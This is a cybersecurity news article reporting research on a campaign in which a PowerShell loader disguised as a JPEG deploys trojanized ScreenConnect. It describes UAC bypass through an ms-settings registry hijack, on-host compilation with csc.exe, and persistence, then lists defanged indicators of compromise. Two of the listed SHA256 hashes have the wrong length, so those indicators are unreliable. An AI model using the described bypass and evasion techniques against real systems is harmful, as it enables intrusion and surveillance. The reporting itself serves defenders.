Hackers Use Weaponized JPEG File to Deploy Trojanized ScreenConnect Malware

HomeCyber Security News Hackers Use Weaponized JPEG File to Deploy Trojanized ScreenConnect Malware By Tushar Subhra Dutta May 11, 2026 A sophisticated new cyberattack campaign is targeting Windows systems using a fake image file to sneak dangerous malware past security defenses. The operation, named Operation SilentCanvas, tricks victims into running a malicious PowerShell script disguised as a harmless JPEG photo, ultimately handing attackers full and silent control of the infected machine. The attack begins when a victim receives what appears to be a routine image file called sysupdate.jpeg through a phishing email, a fake software update prompt, or a deceptive file-sharing link. Despite carrying a .jpeg extension, the file contains no actual image data. Instead, it holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers. Researchers at Cyfirma identified and analyzed the full attack chain, revealing just how deep the intrusion goes once the file is opened. The campaign does not rely on a single trick but chains together multiple advanced techniques to avoid detection and maintain a firm foothold inside targeted environments. Once the initial file runs, the malware downloads a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool widely used across enterprise networks. The altered version gives attackers a persistent hidden back door while appearing to blend in with trusted software already present on the system. The threat also gains elevated privileges without triggering any visible security warning. It does this through a fileless technique that manipulates a Windows registry path and abuses a trusted Windows binary to silently bypass the standard User Account Control prompt. How the Weaponized JPEG Deploys the Malware The sysupdate.jpeg file lacks the standard image header that all real JPEG files carry. When a victim opens it, Windows does not flag it as a script because the extension mimics an image. The embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from legitserver.theworkpc[.]com over TCP port 5443. To avoid antivirus detection, the malware reconstructs dangerous command strings at runtime rather than writing them plainly in the file. It also downloads a secondary payload named access.jpeg and runs it directly in memory, so no suspicious executable touches the disk. Microsoft’s own .NET compiler, csc.exe, then builds a custom launcher named uds.exe directly on the victim machine, giving each compiled binary a unique fingerprint that defeats signature-based scanning. Multi-Stage Infection Chain Overview (Source – Cyfirma) The multi-Stage infection chain shows the end-to-end attack workflow beginning with social engineering and weaponized JPEG delivery, followed by PowerShell payload execution, AMSI bypass, and trojanized ScreenConnect deployment. After the launcher runs, the malware hijacks a registry key tied to the ms-settings protocol and redirects it toward uds.exe. It then triggers ComputerDefaults.exe, a trusted Windows binary that auto-elevates, causing the payload to run with full administrator rights and no visible prompt. The registry key enabling this bypass is deleted within two seconds, destroying evidence before any investigator can find it. Post-Compromise Capabilities and Persistence Once the trojanized ScreenConnect framework is active, the attacker gains remarkable control over the infected machine. The modified software supports real-time screen monitoring, video recording, microphone capture, clipboard interception, keystroke logging, and silent file transfers through an encrypted channel designed to block network inspection. Hex-level static analysis of the weaponized sysupdate.jpeg payload (Source – Cyfirma) The hex-level static analysis of the weaponized sysupdate.jpeg payload shows the embedded PowerShell staging logic and malicious infrastructure references. The malware creates a hidden desktop environment operating out of the logged-in user’s view, allowing the attacker to run tools without detection. A persistent Windows service named OneDriveServers keeps the malware alive across reboots. A separate component intercepts usernames and passwords at the Windows login screen before they reach the authentication system, and hidden local administrator accounts can be created for long-term access. Security teams are advised to block or closely monitor execution of commonly abused Windows binaries including csc.exe, cvtres.exe, and ComputerDefaults.exe. Organizations should enforce strict controls over remote access platforms, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure. Indicators of Compromise (IoCs):- Type Indicator Description IP Address 45[.]138[.]16[.]64 Attacker-controlled C2 backend IP address — Block Domain legitserver[.]theworkpc[.]com Attacker-controlled C2 domain used for payload delivery and remote sessions — Block SHA256 7adffc1c0b3fdcba46e8d0a81203c955976d4ef39893c98d0b2dbfbb8d6a8ec3 Malicious payload hash — Block SHA256 ecd5ed16975d556d1d17bc980f248f8a5262bed11df9d9cf999efd9c273c11df Malicious payload hash — Block SHA256 cea1d85967d2c456fccecae3a70ff2adfe4c113aacf9d18c35 Malicious payload hash — Block SHA256 906c2ed24ca9b46e4c9f3bb4a65c640795bfc1a56c0b56485b849ccd97027eed7ad9aa78a732a4f Malicious payload hash — Block SHA256 ee3d776cdaf82335e4293e19ee313cc35eee49cde9963b96766a8f9c89d44a79 Malicious payload hash — Block SHA256 4d8ac85c5b98c69ba44146df61183e9bf613edd796aa516c3ae73611b7d77c06 Malicious payload hash — Block MD5 7DD05336097E5A833F03A63D3221494F uds.exe compiled dropper hash — Block SHA256 A635F0C94C98B658AE799978994F0D0A292567CD97B8A19068A8423D1297652A uds.exe compiled dropper hash — Block File Name sysupdate.jpeg Weaponized PowerShell loader disguised as JPEG File Name access.jpeg Secondary obfuscated in-memory payload File Name uds.exe On-host compiled malicious launcher binary File Path C:\Systems Attacker staging directory created on victim machine File Path C:\ProgramData\OneDriveServer\ Trojanized ScreenConnect deployment directory Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News New Ivanti EPMM 0-Day Vulnerability Actively Exploited in Attacks Microsoft Edge Stores All Saved Passwords in Cleartext Process Memory at Launch Vimeo Data Breach Exposes 119,000 Users Unique Email Addresses Critical vm2 Node.js Library Vulnerabilities Enables Arbitrary Code Execution Attacks Critical Qualcomm Chipset Vulnerabilities Enables Remote Code Execution Latest News Cyber Security News Vidar Malware Targets Browser Credentials, Cookies, Crypto Wallets, and System Data Cyber Security Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites Cyber Security News JDownloader Downloader Hacked to Infect Users With New Python RAT Cyber Security 10 Best Full Disk Encryption Tools in 2026 Cyber Security News Top 10 Best Interactive Malware Analysis Tools in 2026